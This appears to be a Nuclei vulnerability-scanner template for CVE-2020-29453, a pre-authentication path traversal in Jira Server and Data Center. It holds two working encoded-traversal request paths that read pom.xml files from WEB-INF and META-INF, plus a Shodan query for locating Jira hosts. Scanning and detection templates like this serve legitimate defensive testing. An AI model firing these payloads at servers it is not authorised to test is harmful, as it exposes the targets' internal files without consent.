49 lines
2.0 KiB
YAML
49 lines
2.0 KiB
YAML
id: CVE-2020-29453
|
|
|
|
info:
|
|
name: Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)
|
|
author: dwisiswant0
|
|
severity: medium
|
|
description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.
|
|
impact: |
|
|
An attacker can retrieve sensitive files containing configuration information, potentially leading to further exploitation or unauthorized access.
|
|
remediation: |
|
|
Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.
|
|
reference:
|
|
- https://jira.atlassian.com/browse/JRASERVER-72014
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29453
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
- https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2020-29453
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01696
|
|
epss-percentile: 0.86435
|
|
cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: atlassian
|
|
product: data_center
|
|
shodan-query: http.component:"Atlassian Jira"
|
|
tags: cve,cve2020,atlassian,jira,lfi,intrusive
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
|
|
- "{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- <groupId>com.atlassian.jira</groupId>
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100b410f0ca39281dc5ddeda5d50abe2a078b267a53057d75e940219cba5187674c022035420ad1aa885d5b61ffc9bfa986feda8ce2adf3ebb1502d4a548c7c9e2b5ec2:922c64590222798bb761d5b6d8e72950 |